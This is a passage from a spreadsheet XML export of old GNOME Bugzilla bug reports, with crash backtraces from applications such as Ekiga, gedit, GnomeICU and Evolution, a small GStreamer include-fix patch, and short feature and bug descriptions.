   from /usr/lib/libopal_linux_x86_r.so.2.2
No symbol table info available.
#4  0xb68a4004 in OpalListener::ListenForConnections ()
   from /usr/lib/libopal_linux_x86_r.so.2.2
No symbol table info available.
#5  0xb68ac693 in OpalListener::ListenForConnections_PNotifier::Call ()
   from /usr/lib/libopal_linux_x86_r.so.2.2
No symbol table info available.
#6  0xb71d0c74 in PSimpleThread::Main ()
   from /usr/lib/libpt_linux_x86_r.so.1.10.3
No symbol table info available.
#7  0xb71b845f in PThread::PX_ThreadStart ()
   from /usr/lib/libpt_linux_x86_r.so.1.10.3
No symbol table info available.
#8  0xb654820e in start_thread () from /lib/tls/libpthread.so.0
No symbol table info available.
#9  0xb64ba0de in clone () from /lib/tls/libc.so.6
No symbol table info available.
Thread 5 (Thread -1279636560 (LWP 3106)):
#0  0xb64b2d57 in ___newselect_nocancel () from /lib/tls/libc.so.6
No symbol table info available.
#1  0xb71b86ae in PThread::PXBlockOnIO ()
   from /usr/lib/libpt_linux_x86_r.so.1.10.3
No symbol table info available.
#2  0xb71a616b in PChannel::PXSetIOBlock ()
   from /usr/lib/libpt_linux_x86_r.so.1.10.3
No symbol table info available.
#3  0xb719d5ad in PSocket::os_recvfrom ()
   from /usr/lib/libpt_linux_x86_r.so.1.10.3
No symbol table info available.
#4  0xb71c713e in PIPDatagramSocket::ReadFrom ()
   from /usr/lib/libpt_linux_x86_r.so.1.10.3
No symbol table info available.
#5  0xb71c7ab9 in PUDPSocket::Read () from /usr/lib/libpt_linux_x86_r.so.1.10.3
No symbol table info available.
#6  0xb71a559e in PIndirectChannel::Read ()
   from /usr/lib/libpt_linux_x86_r.so.1.10.3
No symbol table info available.
#7  0xb68a95f9 in OpalTransportUDP::Read ()
   from /usr/lib/libopal_linux_x86_r.so.2.2
No symbol table info available.
#8  0xb71a8030 in PChannelStreamBuffer::underflow ()
   from /usr/lib/libpt_linux_x86_r.so.1.10.3
No symbol table info available.
#9  0xb71a819d in PChannelStreamBuffer::seekoff ()
   from /usr/lib/libpt_linux_x86_r.so.1.10.3
No symbol table info available.
#10 0xb6cc2347 in SIP_PDU::Read () from /usr/lib/libopal_linux_x86_r.so.2.2
No symbol table info available.
#11 0xb6ca3286 in SIPEndPoint::HandlePDU ()
   from /usr/lib/libopal_linux_x86_r.so.2.2
No symbol table info available.
#12 0xb6c9d28d in SIPEndPoint::TransportThreadMain ()
   from /usr/lib/libopal_linux_x86_r.so.2.2
No symbol table info available.
#13 0xb6ca9538 in SIPEndPoint::TransportThreadMain_PNotifier::Call ()
   from /usr/lib/libopal_linux_x86_r.so.2.2
No symbol table info available.
#14 0xb71d0c74 in PSimpleThread::Main ()
   from /usr/lib/libpt_linux_x86_r.so.1.10.3
No symbol table info available.
#15 0xb71b845f in PThread::PX_ThreadStart ()
   from /usr/lib/libpt_linux_x86_r.so.1.10.3
No symbol table info available.
#16 0xb654820e in start_thread () from /lib/tls/libpthread.so.0
No symbol table info available.
#17 0xb64ba0de in clone () from /lib/tls/libc.so.6
No symbol table info available.
Thread 4 (Thread -1280095312 (LWP 3107)):
#0  0xb64b2d57 in ___newselect_nocancel () from /lib/tls/libc.so.6
No symbol table info available.
#1  0xb719f83b in PSocket::Select () from /usr/lib/libpt_linux_x86_r.so.1.10.3
No symbol table info available.
#2  0xb71c7f87 in PSocket::Select () from /usr/lib/libpt_linux_x86_r.so.1.10.3
No symbol table info available.
#3  0xb68a944a in OpalTransportUDP::Read ()
   from /usr/lib/libopal_linux_x86_r.so.2.2
No symbol table info available.
#4  0xb71a8030 in PChannelStreamBuffer::underflow ()
   from /usr/lib/libpt_linux_x86_r.so.1.10.3
No symbol table info available.
#5  0xb71a819d in PChannelStreamBuffer::seekoff ()
   from /usr/lib/libpt_linux_x86_r.so.1.10.3
No symbol table info available.
#6  0xb6cc2347 in SIP_PDU::Read () from /usr/lib/libopal_linux_x86_r.so.2.2
No symbol table info available.
#7  0xb6ca3286 in SIPEndPoint::HandlePDU ()
   from /usr/lib/libopal_linux_x86_r.so.2.2
No symbol table info available.
#8  0xb6c9d28d in SIPEndPoint::TransportThreadMain ()
   from /usr/lib/libopal_linux_x86_r.so.2.2
No symbol table info available.
#9  0xb6ca9538 in SIPEndPoint::TransportThreadMain_PNotifier::Call ()
   from /usr/lib/libopal_linux_x86_r.so.2.2
No symbol table info available.
#10 0xb71d0c74 in PSimpleThread::Main ()
   from /usr/lib/libpt_linux_x86_r.so.1.10.3
No symbol table info available.
#11 0xb71b845f in PThread::PX_ThreadStart ()
   from /usr/lib/libpt_linux_x86_r.so.1.10.3
No symbol table info available.
#12 0xb654820e in start_thread () from /lib/tls/libpthread.so.0
No symbol table info available.
#13 0xb64ba0de in clone () from /lib/tls/libc.so.6
No symbol table info available.
Thread 3 (Thread -1278747728 (LWP 3108)):
#0  0xb654e071 in __waitpid_nocancel () from /lib/tls/libpthread.so.0
No symbol table info available.
#1  0xb7ddd228 in libgnomeui_module_info_get () from /usr/lib/libgnomeui-2.so.0
No symbol table info available.
#2  
No symbol table info available.
#3  0xb71dc1ac in PContainer::PContainer ()
   from /usr/lib/libpt_linux_x86_r.so.1.10.3
No symbol table info available.
#4  0xb71dc745 in PString::PString () from /usr/lib/libpt_linux_x86_r.so.1.10.3
No symbol table info available.
#5  0xb68a36f0 in OpalTransportAddress::OpalTransportAddress ()
   from /usr/lib/libopal_linux_x86_r.so.2.2
No symbol table info available.
#6  0xb6caa143 in SIPEndPoint::RegistrationList::FindSIPInfoByDomain ()
   from /usr/lib/libopal_linux_x86_r.so.2.2
No symbol table info available.
#7  0x080a6bfd in PNotifier::~PNotifier ()
No symbol table info available.
#8  0xb6cad536 in SIPConnection::SetLocalPartyAddress ()
   from /usr/lib/libopal_linux_x86_r.so.2.2
No symbol table info available.
#9  0xb6cada74 in SIPConnection::WriteINVITE ()
   from /usr/lib/libopal_linux_x86_r.so.2.2
No symbol table info available.
#10 0xb68a931a in OpalTransportUDP::WriteConnect ()
   from /usr/lib/libopal_linux_x86_r.so.2.2
No symbol table info available.
#11 0xb6cb68d1 in SIPConnection::SetUpConnection ()
   from /usr/lib/libopal_linux_x86_r.so.2.2
No symbol table info available.
#12 0xb68832dd in OpalCall::OnSetUp () from /usr/lib/libopal_linux_x86_r.so.2.2
No symbol table info available.
#13 0xb68b21f0 in OpalPCSSConnection::InitiateCall ()
   from /usr/lib/libopal_linux_x86_r.so.2.2
No symbol table info available.
#14 0xb68b30d5 in OpalPCSSEndPoint::MakeConnection ()
   from /usr/lib/libopal_linux_x86_r.so.2.2
No symbol table info available.
#15 0xb686fd84 in OpalManager::MakeConnection ()
   from /usr/lib/libopal_linux_x86_r.so.2.2
No symbol table info available.
#16 0xb686e3a3 in OpalManager::SetUpCall ()
   from /usr/lib/libopal_linux_x86_r.so.2.2
No symbol table info available.
#17 0x08099d15 in PList::Clone ()
No symbol table info available.
#18 0x080a9ef5 in PSafePtr::CompareObjectMemoryDirect ()
No symbol table info available.
#19 0xb71b845f in PThread::PX_ThreadStart ()
   from /usr/lib/libpt_linux_x86_r.so.1.10.3
No symbol table info available.
#20 0xb654820e in start_thread () from /lib/tls/libpthread.so.0
No symbol table info available.
#21 0xb64ba0de in clone () from /lib/tls/libc.so.6
No symbol table info available.
Thread 2 (Thread -1280357456 (LWP 3109)):
#0  0xb654cfd9 in __lll_mutex_lock_wait () from /lib/tls/libpthread.so.0
No symbol table info available.
#1  0xb6549e94 in _L_mutex_lock_160 () from /lib/tls/libpthread.so.0
No symbol table info available.
#2  0xb3af4000 in ?? ()
No symbol table info available.
#3  0xb7eeec21 in operator new () from /usr/lib/libstdc++.so.6
No symbol table info available.
#4  0xb71b786b in PTimedMutex::Wait ()
   from /usr/lib/libpt_linux_x86_r.so.1.10.3
No symbol table info available.
#5  0xb68a93e1 in OpalTransportUDP::Read ()
   from /usr/lib/libopal_linux_x86_r.so.2.2
No symbol table info available.
#6  0xb71a8030 in PChannelStreamBuffer::underflow ()
   from /usr/lib/libpt_linux_x86_r.so.1.10.3
No symbol table info available.
#7  0xb71a819d in PChannelStreamBuffer::seekoff ()
   from /usr/lib/libpt_linux_x86_r.so.1.10.3
No symbol table info available.
#8  0xb6cc2347 in SIP_PDU::Read () from /usr/lib/libopal_linux_x86_r.so.2.2
No symbol table info available.
#9  0xb6ca3286 in SIPEndPoint::HandlePDU ()
   from /usr/lib/libopal_linux_x86_r.so.2.2
No symbol table info available.
#10 0xb6c9d28d in SIPEndPoint::TransportThreadMain ()
   from /usr/lib/libopal_linux_x86_r.so.2.2
No symbol table info available.
#11 0xb6ca9538 in SIPEndPoint::TransportThreadMain_PNotifier::Call ()
   from /usr/lib/libopal_linux_x86_r.so.2.2
No symbol table info available.
#12 0xb71d0c74 in PSimpleThread::Main ()
   from /usr/lib/libpt_linux_x86_r.so.1.10.3
No symbol table info available.
#13 0xb71b845f in PThread::PX_ThreadStart ()
   from /usr/lib/libpt_linux_x86_r.so.1.10.3
No symbol table info available.
#14 0xb654820e in start_thread () from /lib/tls/libpthread.so.0
No symbol table info available.
#15 0xb64ba0de in clone () from /lib/tls/libc.so.6
No symbol table info available.
Thread 1 (Thread -1248979264 (LWP 3063)):
#0  0xb64b074a in poll () from /lib/tls/libc.so.6
No symbol table info available.
#1  0xb736d8d6 in g_main_context_acquire () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#2  0xb736dc6a in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#3  0xb7a9de33 in gtk_main () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#4  0x08088eb2 in PList::Clone ()
No symbol table info available.
#5  0xb6405e14 in __libc_start_main () from /lib/tls/libc.so.6
No symbol table info available.
#6  0x080649f1 in ?? ()
No symbol table info available.
#0  0xb64b074a in poll () from /lib/tls/libc.so.6</t>
  </si>
  <si>
    <t>GNOME-DESKTOP-115192</t>
  </si>
  <si>
    <t>gnome-about</t>
  </si>
  <si>
    <t>gnome-about always uses GNOME 2.0 in blurb</t>
  </si>
  <si>
    <t>gnome-about talks about version 2.0 of the GNOME desktop. Patch incoming.</t>
  </si>
  <si>
    <t>SYSTEM-MONITOR-327865</t>
  </si>
  <si>
    <t>Memory maps table is empty</t>
  </si>
  <si>
    <t>Please describe the problem:
The table in Memory Maps dialog has no row. 
Steps to reproduce:
1. Select a process
2. Choose View-&gt;Memory Maps
3. Look the dialog
Actual results:
The table is empty :-(
Expected results:
The table should list memory maps :-)
Does this happen every time?
Yes. For all processes
Other information:</t>
  </si>
  <si>
    <t>F-SPOT-165033</t>
  </si>
  <si>
    <t>f-spot crashes when the last photo in the library is deleted</t>
  </si>
  <si>
    <t>Steps to reproduce:
1. import several photos
2. select last photo
3. go to edit mode
4. delete photo
Stack trace:
Other information:</t>
  </si>
  <si>
    <t>GSTREAMER-323878</t>
  </si>
  <si>
    <t>missing  inclusion (for memset &amp; FD_ZERO)</t>
  </si>
  <si>
    <t xml:space="preserve">string.h is needed else gsttcp won't compile on some platforms.
Index: gst/tcp/gsttcp.c
===================================================================
RCS file: /cvs/gstreamer/gst-plugins-base/gst/tcp/gsttcp.cv
retrieving revision 1.21
diff -u -r1.21 gsttcp.c
--- gst/tcp/gsttcp.c    17 Oct 2005 13:46:22 -0000      1.21
+++ gst/tcp/gsttcp.c    12 Dec 2005 14:10:05 -0000
@@ -296 +297 @@
 #include 
 #include 
 #include 
+#include   /* memset in FD_ZERO macro */
 #include 
 #include 
Index: gst/tcp/gsttcpclientsink.c
===================================================================
RCS file: /cvs/gstreamer/gst-plugins-base/gst/tcp/gsttcpclientsink.cv
retrieving revision 1.16
diff -u -r1.16 gsttcpclientsink.c
--- gst/tcp/gsttcpclientsink.c  1 Dec 2005 01:21:49 -0000       1.16
+++ gst/tcp/gsttcpclientsink.c  12 Dec 2005 14:10:05 -0000
@@ -256 +257 @@
 #include 
 #include gsttcp.h
 #include gsttcpclientsink.h
+#include              /* memset */
 /* elementfactory information */
 static GstElementDetails gst_tcp_client_sink_details =
Index: gst/tcp/gsttcpserversink.c
===================================================================
RCS file: /cvs/gstreamer/gst-plugins-base/gst/tcp/gsttcpserversink.cv
retrieving revision 1.28
diff -u -r1.28 gsttcpserversink.c
--- gst/tcp/gsttcpserversink.c  6 Dec 2005 19:41:59 -0000       1.28
+++ gst/tcp/gsttcpserversink.c  12 Dec 2005 14:10:05 -0000
@@ -296 +297 @@
 #include config.h
 #endif
 #include 
+#include              /* memset */
 #include 
Index: gst/tcp/gsttcpserversrc.c
===================================================================
RCS file: /cvs/gstreamer/gst-plugins-base/gst/tcp/gsttcpserversrc.cv
retrieving revision 1.27
diff -u -r1.27 gsttcpserversrc.c
--- gst/tcp/gsttcpserversrc.c   6 Dec 2005 19:41:59 -0000       1.27
+++ gst/tcp/gsttcpserversrc.c   12 Dec 2005 14:10:06 -0000
@@ -266 +267 @@
 #include 
 #include gsttcp.h
 #include gsttcpserversrc.h
+#include              /* memset */
 #include 
 #include 
 #include </t>
  </si>
  <si>
    <t>ben.pineau</t>
  </si>
  <si>
    <t>BANSHEE-395577</t>
  </si>
  <si>
    <t>iPod detection does not work when banshee is launched with 'make run' without installing</t>
  </si>
  <si>
    <t>Please describe the problem:
I have two banshees installed: a stable (rpm) one and the current SVN. And always I try to run the SVN version iPod is not shown. However the stable version shows it perfectly.
Steps to reproduce:
Actual results:
Warning messages on the console: 
Debug: [11/01/2007 22:26:41] (Loading audio profiles) - ../../../data/audio-profiles
Debug: [11/01/2007 22:26:43] (Default player engine) - Helix Remote
Debug: [11/01/2007 22:26:43] (Audio CD Core Initialized) - 
Debug: [11/01/2007 22:26:44] (Testing device for DAP support) - /org/freedesktop/Hal/devices/volume_uuid_30E9_5C54
Information: [11/01/2007 22:26:44] (Mass Storage Support Ignoring iPod) - The USB mass storage audio player support ignored an iPod. Either Banshee's iPod support is broken or missing or the iPod itself may be corrupted.
Debug: [11/01/2007 22:26:44] (DAP has not been added) - /org/freedesktop/Hal/devices/volume_uuid_30E9_5C54
Debug: [11/01/2007 22:26:44] (Testing device for DAP support) - /org/freedesktop/Hal/devices/storage_serial_Apple_iPod_000A270014BA87AF
Debug: [11/01/2007 22:26:44] (DAP has not been added) - /org/freedesktop/Hal/devices/storage_serial_Apple_iPod_000A270014BA87AF
Expected results:
Does this happen every time?
Yes
Other information:</t>
  </si>
  <si>
    <t>knocte</t>
  </si>
  <si>
    <t>TOMBOY-383765</t>
  </si>
  <si>
    <t>Remove NoteOfTheDay plugin from Tools menu</t>
  </si>
  <si>
    <t>The NoteOfTheDay plugin shouldn't have to add itself to the Tools menu anymore.  It should be modified to be enabled if it's enabled in the new plugin configuration UI.</t>
  </si>
  <si>
    <t>btimothy</t>
  </si>
  <si>
    <t>LIBGNOMEUI-147571</t>
  </si>
  <si>
    <t>file-chooser</t>
  </si>
  <si>
    <t>Crash in the new file selector with the gnome-vfs backend</t>
  </si>
  <si>
    <t>Distribution: Fedora Core release 1 (Yarrow)
Package: gedit
Severity: normal
Version: GNOME2.7.3 2.7.1
Gnome-Distributor: GNOME.Org
Synopsis: Crash in the new file selectory with the gnome-vfs backend
Bugzilla-Product: gedit
Bugzilla-Component: general
Bugzilla-Version: 2.7.1
BugBuddy-GnomeVersion: 2.0 (2.7.1)
Description:
Description of the crash:
gedit eog and other applications using the new file selector with the
gnome-vfs backends crash when the Open button is pressed.
Steps to reproduce the crash:
1. Run gedit
2. File-&gt;Open
3. Select a text file
4. Press the open button
5. gedit crashes
Expected Results:
The file is opened
How often does this happen?
Always with today CVS HEAD
Additional Information:
Note that I have just updated my gnome installation using jhbuild
(gnome-2-8 modules set).
Repository revision: 1.444   /cvs/gnome/libgnomeui/ChangeLogv
Repository revision: 1.1845  /cvs/gnome/gnome-vfs/ChangeLogv
Repository revision: 1.5367.2.126    /cvs/gnome/gtk+/ChangeLogv
Debugging Information:
Backtrace was generated from '/gnome/gnome28/INSTALL/bin/gedit'
Using host libthread_db library /lib/libthread_db.so.1.
[Thread debugging using libthread_db enabled]
[New Thread 16384 (LWP 28714)]
[New Thread 32769 (LWP 28721)]
[New Thread 16386 (LWP 28722)]
[New Thread 32771 (LWP 28723)]
0x0041270b in waitpid () from /lib/libpthread.so.0
#0  0x0041270b in waitpid () from /lib/libpthread.so.0
#1  0x005f2000 in __JCR_LIST__ ()
   from /gnome/gnome28/INSTALL/lib/libgnomeui-2.so.0
Thread 4 (Thread 32771 (LWP 28723)):
#0  0x0040df64 in __pthread_sigsuspend () from /lib/libpthread.so.0
No symbol table info available.
#1  0x0040d79d in __pthread_wait_for_restart_signal ()
   from /lib/libpthread.so.0
No symbol table info available.
#2  0x00409f65 in pthread_cond_wait@GLIBC_2.0 () from
/lib/libpthread.so.0
No symbol table info available.
#3  0x001f017a in gnome_vfs_thread_pool_wait_for_work (state=0xa06d2f8)
    at gnome-vfs-thread-pool.c:163
No locals.
#4  0x001f01c0 in thread_entry (cast_to_state=0xa06d2f8)
    at gnome-vfs-thread-pool.c:176
No locals.
#5  0x006661c0 in g_thread_create_proxy (data=0xa06d370) at
gthread.c:556
No locals.
#6  0x0040b79e in pthread_start_thread () from /lib/libpthread.so.0
No symbol table info available.
#7  0x009f21ea in clone () from /lib/libc.so.6
No symbol table info available.
Thread 3 (Thread 16386 (LWP 28722)):
#0  0x009e9eba in poll () from /lib/libc.so.6
No symbol table info available.
#1  0x00651187 in g_main_context_poll (context=0xa058478 timeout=-1 
    priority=2147483647 fds=0xa059440 n_fds=9) at gmain.c:2875
	poll_func = 0x9e9e54 
#2  0x00650734 in g_main_context_iterate (context=0xa058478 block=1 
    dispatch=1 self=0xa058588) at gmain.c:2568
	got_ownership = -4
	max_priority = 2147483647
	timeout = -1
	some_ready = 9
	nfds = 9
	allocated_nfds = 9
	fds = (GPollFD *) 0xa059440
#3  0x00650d1a in g_main_loop_run (loop=0xa053a28) at gmain.c:2777
	got_ownership = 11518272
	self = (GThread *) 0xa058588
#4  0x00148976 in link_io_thread_fn (data=0x0) at linc.c:343
No locals.
#5  0x006661c0 in g_thread_create_proxy (data=0xa058588) at
gthread.c:556
No locals.
#6  0x0040b79e in pthread_start_thread () from /lib/libpthread.so.0
No symbol table info available.
#7  0x009f21ea in clone () from /lib/libc.so.6
No symbol table info available.
Thread 2 (Thread 32769 (LWP 28721)):
#0  0x009e9eba in poll () from /lib/libc.so.6
No symbol table info available.
#1  0x0040abeb in __pthread_manager () from /lib/libpthread.so.0
No symbol table info available.
#2  0x009f21ea in clone () from /lib/libc.so.6
No symbol table info available.
Thread 1 (Thread 16384 (LWP 28714)):
#0  0x0041270b in waitpid () from /lib/libpthread.so.0
No symbol table info available.
#1  0x005f2000 in __JCR_LIST__ ()
   from /gnome/gnome28/INSTALL/lib/libgnomeui-2.so.0
No symbol table info available.
#0  0x0041270b in waitpid () from /lib/libpthread.so.0</t>
  </si>
  <si>
    <t>GNOME-BLOG-497363</t>
  </si>
  <si>
    <t>Cannot focus in text fields to enter text</t>
  </si>
  <si>
    <t>Please describe the problem:
After the applet is loaded configured etc and I click on the 'BlogV' button I cannot enter text into the Title field or main text area unless I paste it. That is when I click on the text field a cursor does not show up text does not appear when I type text is not deleted with backspace / delete. 
The only way to enter text is to use Copy / Paste.
I'm fairly certain that clicking on the applet button does not focus keyboard input on the 'Post' drop down window as it should. Therefore whatever window had the keyboard focus last keeps the focus and the 'Post' window does not gain the keyboard focus.
I am using gnome-2.20 &amp;&amp; gnome-blog-0.9 from Gentoo.
Steps to reproduce:
1. 
2. 
3. 
Actual results:
The last window that had focus keeps the focus so that window receives the keyboard input.
Expected results:
The gnome-blog 'Post' drop-down window should receive the keyboard input.
Does this happen every time?
yes
Other information:
sudo emerge -avD1 --with-bdeps y gnome-blog
Password:
These are the packages that would be merged in order:
Calculating dependencies |
!!! Multiple versions within a single package slot have been 
!!! pulled into the dependency graph:
('installed' '/' 'gnome-base/gnome-vfs-2.20.0' 'nomerge') pulled in by
  ('installed' '/' 'gnome-base/nautilus-2.20.0' 'nomerge')
('ebuild' '/' 'gnome-base/gnome-vfs-2.18.1' 'merge') pulled in by
  ('installed' '/' 'gnome-base/libbonoboui-2.20.0' 'nomerge')
  ('installed' '/' 'gnome-extra/evolution-data-server-1.12.1' 'nomerge')
  ('installed' '/' 'gnome-base/gnome-panel-2.20.1' 'nomerge')
  ('installed' '/' 'dev-dotnet/gnomevfs-sharp-2.16.0' 'nomerge')
  ('installed' '/' 'gnome-base/eel-2.20.0' 'nomerge')
  ('installed' '/' 'gnome-base/gnome-desktop-2.20.1' 'nomerge')
  ('installed' '/' 'gnome-base/libgnome-2.20.1.1' 'nomerge')
It may be possible to solve this problem by using package.mask to
prevent one of those packages from being selected. However it is also
possible that conflicting dependencies exist such that they are
impossible to satisfy simultaneously. If such a conflict exists in the
dependencies of two different packages then those packages can not be
installed simultaneously.
For more information see MASKED PACKAGES section in the emerge man page
or refer to the Gentoo Handbook.</t>
  </si>
  <si>
    <t>chrisfriedt</t>
  </si>
  <si>
    <t>GNOMEICU-92883</t>
  </si>
  <si>
    <t>Main Window</t>
  </si>
  <si>
    <t>Status change =&gt; crashed in new_tlv</t>
  </si>
  <si>
    <t xml:space="preserve">Package: GnomeICU
Severity: normal
Version: 0.98.114
Synopsis: Status change =&gt; crashed in new_tlv
Bugzilla-Product: GnomeICU
Bugzilla-Component: Main Window
BugBuddy-GnomeVersion: 2.0 (2.0.3)
Description:
Description of Problem:
I was making some test on the Retrieve away message and I change from
Away to Occupied (I think). And it crashed.
It's latest CVS and the line where it crashes is :
	g_memmove(tlv-&gt;value place+4 tlv-&gt;len)
Steps to reproduce the problem:
1. unreproducable
2. 
3. 
Actual Results:
Expected Results:
Well no crash :)
How often does this happen?
Just once.
Additional Information:
If some packet dump helps...
newtlv type:0 len: 0
newtlv type:0 len: 12293
newtlv type:14 len: 55319
newtlv type:0 len: 0
newtlv type:0 len: 0
newtlv type:0 len: 256
newtlv type:0 len: 53464
newtlv type:0 len: 0
newtlv type:0 len: 0
newtlv type:0 len: 256
newtlv type:aaaa len: 16386
newtlv type:9c40 len: 256
newtlv type:0 len: 4096
newtlv type:0 len: 256
newtlv type:4508 len: 4096
newtlv type:4508 len: 22549
newtlv type:1 len: 0
newtlv type:0 len: 0
newtlv type:0 len: 0
newtlv type:0 len: 0
newtlv type:d8 len: 15375
newtlv type:80 len: 0
newtlv type:0 len: 0
newtlv type:0 len: 0
Debugging Information:
Backtrace was generated from '/usr/local/garnome/bin/gnomeicu'
[New Thread 1024 (LWP 4136)]
[New Thread 2049 (LWP 4137)]
0x4094fa39 in wait4 () from /lib/libc.so.6
#0  0x4094fa39 in wait4 () from /lib/libc.so.6
#1  0x409c6e48 in __check_rhosts_file () from /lib/libc.so.6
#2  0x4076d453 in waitpid () from /lib/libpthread.so.0
#3  0x4006d883 in libgnomeui_segv_handle (signum=11) at
gnome-ui-init.c:620
#4  0x4076af54 in pthread_sighandler () from /lib/libpthread.so.0
#5  0x408d86b8 in sigaction () from /lib/libc.so.6
#6  0x08080f1c in new_tlv (place=0x846af1c ) at v7base.c:196
#7  0x0808510d in v7_server_status (snac=0x8404728 conn=0x81a4698)
    at v7recv.c:1996
#8  0x0808273a in v7_snac_channel_handler (packet=0x81a4710
conn=0x81a4698)
    at v7recv.c:224
#9  0x0808262a in v7_handler (iochannel=0x81adba0 condition=G_IO_IN 
    conn=0x81a4698) at v7recv.c:173
#10 0x407b452c in g_io_unix_dispatch (source=0x81adbe8 
    callback=0x80825d8  user_data=0x81a4698) at
giounix.c:158
#11 0x40796ad9 in g_main_dispatch (context=0x80add68) at gmain.c:1617
#12 0x407978f7 in g_main_context_dispatch (context=0x80add68) at
gmain.c:2161
#13 0x40797cd3 in g_main_context_iterate (context=0x80add68 block=1 
    dispatch=1 self=0x809fb00) at gmain.c:2242
#14 0x407983af in g_main_loop_run (loop=0x81a5cb0) at gmain.c:2462
#15 0x4028b12f in gtk_main () at gtkmain.c:936
#16 0x080664d0 in main (argc=1 argv=0xbffffbd4) at gnomeicu.c:527
Thread 2 (Thread 2049 (LWP 4137)):
#0  0x40977b90 in poll () from /lib/libc.so.6
No symbol table info available.
#1  0x40767d96 in __pthread_manager () from /lib/libpthread.so.0
No symbol table info available.
Thread 1 (Thread 1024 (LWP 4136)):
#0  0x4094fa39 in wait4 () from /lib/libc.so.6
No symbol table info available.
#1  0x409c6e48 in __check_rhosts_file () from /lib/libc.so.6
No symbol table info available.
#2  0x4076d453 in waitpid () from /lib/libpthread.so.0
No symbol table info available.
#3  0x4006d883 in libgnomeui_segv_handle (signum=11) at
gnome-ui-init.c:620
	estatus = 138751501
	in_segv = 1
	pid = 0
#4  0x4076af54 in pthread_sighandler () from /lib/libpthread.so.0
No symbol table info available.
#5  0x408d86b8 in sigaction () from /lib/libc.so.6
No symbol table info available.
#6  0x08080f1c in new_tlv (place=0x846af1c ) at v7base.c:196
	place = (BYTE *) 0x0
	tlv = (TLV *) 0x0
#7  0x0808510d in v7_server_status (snac=0x8404728 conn=0x81a4698)
    at v7recv.c:1996
	snac = (Snac *) 0xfffffe00
	here = (gchar *) 0x846af1c 
	tlvcount = -512
	i = 0
	tlv = (TLV *) 0x843f120
#8  0x0808273a in v7_snac_channel_handler (packet=0x81a4710
conn=0x81a4698)
    at v7recv.c:224
	conn = (V7Connection *) 0x81a4698
	snac = (Snac *) 0x8404728
#9  0x0808262a in v7_handler (iochannel=0x81adba0 condition=G_IO_IN 
    conn=0x81a4698) at v7recv.c:173
	conn = (V7Connection *) 0x81a4698
	packet = (V7Packet *) 0x81a4710
#10 0x407b452c in g_io_unix_dispatch (source=0x81adbe8 
    callback=0x80825d8  user_data=0x81a4698) at
giounix.c:158
	source = (GSource *) 0x81adbe8
	callback = 0x80825d8 
	buffer_condition = 0
#11 0x40796ad9 in g_main_dispatch (context=0x80add68) at gmain.c:1617
	was_in_call = 0
	user_data = 0x81a4698
	callback = 0x80825d8 
	cb_funcs = (GSourceCallbackFuncs *) 0x407da278
	cb_data = 0x81adc30
	need_destroy = 1081511558
	dispatch = (gboolean (*)()) 0x407b44e8 
	source = (GSource *) 0x81adbe8
	i = 0
#12 0x407978f7 in g_main_context_dispatch (context=0x80add68) at
gmain.c:2161
	context = (GMainContext *) 0x80add68
#13 0x40797cd3 in g_main_context_iterate (context=0x80add68 block=1 
    dispatch=1 self=0x809fb00) at gmain.c:2242
	max_priority = 2147483647
	timeout = 385
	some_ready = 0
	nfds = 11
	allocated_nfds = 11
	fds = (GPollFD *) 0x81ab508
#14 0x407983af in g_main_loop_run (loop=0x81a5cb0) at gmain.c:2462
	loop = (GMainLoop *) 0x81a5cb0
	self = (GThread *) 0x809fb00
#15 0x4028b12f in gtk_main () at gtkmain.c:936
	tmp_list = (GList *) 0x0
	functions = (GList *) 0x0
	init = (GtkInitFunction *) 0x80a0d80
	loop = (GMainLoop *) 0x81a5cb0
#16 0x080664d0 in main (argc=1 argv=0xbffffbd4) at gnomeicu.c:527
	cx = 134874368
	client = (GnomeClient *) 0x80a0d80
	arguments = {{longName = 0x808d603 uin shortName = 117 'u' 
    argInfo = 1 arg = 0x8098780 val = 0 
    descrip = 0x808d5ef Use the defined UIN argDescrip = 0x808d5eb
UIN} {
    longName = 0x808d5e4 ipaddr shortName = 105 'i' argInfo = 1 
    arg = 0x8098784 val = 0 
    descrip = 0x808d5c6 Set IP address to send to ICQ 
    argDescrip = 0x808d5c3 IP} {longName = 0x0 shortName = 0 '\0' 
    argInfo = 0 arg = 0x0 val = 0 descrip = 0x0 argDescrip = 0x0}}
#0  0x4094fa39 in wait4 () from /lib/libc.so.6
------- Bug moved to this database by unknown@bugzilla.gnome.org 2002-09-09 14:55 -------
Unknown version unspecified in product GnomeICU. Setting version to 0.94.1.
Reassigning to the default owner of the component jwise@springthrough.com.
</t>
  </si>
  <si>
    <t>jwise</t>
  </si>
  <si>
    <t>DIA-346351</t>
  </si>
  <si>
    <t>font export size is wrong</t>
  </si>
  <si>
    <t>Please describe the problem:
When I create a UML diagram and export it to PNG or EPS (Pango) the text within the boxes tends to run outside the box.  The images look fine on the screen but when exported I encounter this problem.  This also happens to a lesser extent when using EPS export non-Pango.
Steps to reproduce:
1. Create UML class with some methods in it.
2. Export to PNG or EPS 
3. Open with another viewer 
Actual results:
The file is generated without warnings but when I view it the text overruns the right edge of the boxes.
Expected results:
The text should look like it does on the screen natch.
Does this happen every time?
Yes.
Other information:
I can send sample images if it's a quirk of my setup.  I'm running Mandriva 2006.</t>
  </si>
  <si>
    <t>paul.gestwicki</t>
  </si>
  <si>
    <t>GTK+-347902</t>
  </si>
  <si>
    <t>GtkRange doesn't reliably update stepper sensitivity</t>
  </si>
  <si>
    <t>When range-&gt;adjustment changes would leave the widget's visual
appearance unmodified (because the change was too small for the
range's allocation) the steppers' sensitivity is not updated
and can become inconsistent. Patch follows.</t>
  </si>
  <si>
    <t>EVOLUTION-205110</t>
  </si>
  <si>
    <t>Switching folders [was: Mailer crashed in activity client code]</t>
  </si>
  <si>
    <t>When I tried recovering from an IMAP message header syncing problem (see
bug#205109) I went into evolution/mail/imap/ and moved my INBOX
folder to something else.  I then restarted Evolution.  When I tried to go
to my IMAP inbox Evolution crashed.  Below is the backtrace.  When I
started evolution again things worked fine once again.
[New Thread 1024 (LWP 30254)]
[New Thread 2049 (LWP 30260)]
[New Thread 1026 (LWP 30261)]
[New Thread 2051 (LWP 30262)]
[New Thread 5124 (LWP 30265)]
[New Thread 4101 (LWP 30264)]
0x40b4f689 in wait4 () from /lib/libc.so.6
#0  0x40b4f689 in wait4 () from /lib/libc.so.6
#1  0x40bc06ec in __check_rhosts_file () from /lib/libc.so.6
#2  0x40207aa6 in waitpid (pid=30270 stat_loc=0xbffff1ec options=0)
